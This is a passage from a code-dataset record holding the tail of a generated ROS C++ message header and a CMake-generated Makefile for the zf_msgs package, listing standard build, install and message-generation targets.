Printer<double>::stream(s, indent + \" \", v.a_earth);\n s << indent << \"v_roll: \";\n Printer<double>::stream(s, indent + \" \", v.v_roll);\n s << indent << \"v_pitch: \";\n Printer<double>::stream(s, indent + \" \", v.v_pitch);\n s << indent << \"v_head: \";\n Printer<double>::stream(s, indent + \" \", v.v_head);\n s << indent << \"status1: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.status1);\n s << indent << \"status2: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.status2);\n s << indent << \"checksum: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.checksum);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZF_MSGS_MESSAGE_POS320_H\n"
},
{
"alpha_fraction": 0.7511162161827087,
"alphanum_fraction": 0.7637599110603333,
"avg_line_length": 42.861351013183594,
"blob_id": "ee715f1c5a432a73c82adb1db0a5d57e818c79fa",
"content_id": "181d1ce7ba136b1cbd6155df75f6dfc0c0b08e92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 25309,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 577,
"path": "/build/zf_msgs/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n\n# Convenience name for target.\nzf_msgs_genpy: zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n\n.PHONY : zf_msgs_genpy\n\n# fast build rule for target.\nzf_msgs_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_genpy.dir/build.make zf_msgs/CMakeFiles/zf_msgs_genpy.dir/build\n.PHONY : zf_msgs_genpy/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n\n# Convenience name for target.\nzf_msgs_gencpp: zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n\n.PHONY : zf_msgs_gencpp\n\n# fast build rule for target.\nzf_msgs_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/build\n.PHONY : zf_msgs_gencpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_eus: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_eus\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build\n.PHONY : geometry_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_py: zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n\n.PHONY : zf_msgs_generate_messages_py\n\n# fast build rule for target.\nzf_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/build\n.PHONY : zf_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_py: zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n\n.PHONY : std_msgs_generate_messages_py\n\n# fast build rule for target.\nstd_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/build\n.PHONY : std_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_nodejs\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/build\n.PHONY : geometry_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages: zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n\n.PHONY : zf_msgs_generate_messages\n\n# fast build rule for target.\nzf_msgs_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/build\n.PHONY : zf_msgs_generate_messages/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : std_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nstd_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/build\n.PHONY : std_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : std_msgs_generate_messages_cpp\n\n# fast build rule for target.\nstd_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/build\n.PHONY : std_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n\n# Convenience name for target.\n_zf_msgs_generate_messages_check_deps_pose2dArray: zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n\n.PHONY : _zf_msgs_generate_messages_check_deps_pose2dArray\n\n# fast build rule for target.\n_zf_msgs_generate_messages_check_deps_pose2dArray/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/build.make zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/build\n.PHONY : _zf_msgs_generate_messages_check_deps_pose2dArray/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_eus: zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : std_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n\n# Convenience name for target.\nzf_msgs_genlisp: zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n\n.PHONY : zf_msgs_genlisp\n\n# fast build rule for target.\nzf_msgs_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/build\n.PHONY : zf_msgs_genlisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_lisp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build\n.PHONY : geometry_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : std_msgs_generate_messages_lisp\n\n# fast build rule for target.\nstd_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/build\n.PHONY : std_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_py: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_py\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_py.dir/build\n.PHONY : geometry_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n\n# Convenience name for target.\n_zf_msgs_generate_messages_check_deps_pos320: zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/rule\n\n.PHONY : _zf_msgs_generate_messages_check_deps_pos320\n\n# fast build rule for target.\n_zf_msgs_generate_messages_check_deps_pos320/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/build.make zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pos320.dir/build\n.PHONY : _zf_msgs_generate_messages_check_deps_pos320/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : zf_msgs_generate_messages_lisp\n\n# fast build rule for target.\nzf_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_lisp.dir/build\n.PHONY : zf_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : zf_msgs_generate_messages_cpp\n\n# fast build rule for target.\nzf_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_cpp.dir/build\n.PHONY : zf_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_eus: zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/rule\n\n.PHONY : zf_msgs_generate_messages_eus\n\n# fast build rule for target.\nzf_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_eus.dir/build\n.PHONY : zf_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n\n# Convenience name for target.\nzf_msgs_geneus: zf_msgs/CMakeFiles/zf_msgs_geneus.dir/rule\n\n.PHONY : zf_msgs_geneus\n\n# fast build rule for target.\nzf_msgs_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_geneus.dir/build.make zf_msgs/CMakeFiles/zf_msgs_geneus.dir/build\n.PHONY : zf_msgs_geneus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_cpp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_cpp.dir/build\n.PHONY : geometry_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : zf_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nzf_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_nodejs.dir/build\n.PHONY : zf_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n\n# Convenience name for target.\n_catkin_empty_exported_target: zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/rule\n\n.PHONY : _catkin_empty_exported_target\n\n# fast build rule for target.\n_catkin_empty_exported_target/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/build.make zf_msgs/CMakeFiles/_catkin_empty_exported_target.dir/build\n.PHONY : _catkin_empty_exported_target/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n\n# Convenience name for target.\nzf_msgs_gennodejs: zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/rule\n\n.PHONY : zf_msgs_gennodejs\n\n# fast build rule for target.\nzf_msgs_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/build.make zf_msgs/CMakeFiles/zf_msgs_gennodejs.dir/build\n.PHONY : zf_msgs_gennodejs/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... list_install_components\"\n\t@echo \"... edit_cache\"\n\t@echo \"... test\"\n\t@echo \"... install/strip\"\n\t@echo \"... zf_msgs_genpy\"\n\t@echo \"... zf_msgs_gencpp\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... geometry_msgs_generate_messages_nodejs\"\n\t@echo \"... zf_msgs_generate_messages\"\n\t@echo \"... std_msgs_generate_messages_nodejs\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... _zf_msgs_generate_messages_check_deps_pose2dArray\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... install\"\n\t@echo \"... zf_msgs_genlisp\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... _zf_msgs_generate_messages_check_deps_pos320\"\n\t@echo \"... zf_msgs_generate_messages_lisp\"\n\t@echo \"... zf_msgs_generate_messages_cpp\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... zf_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_geneus\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo 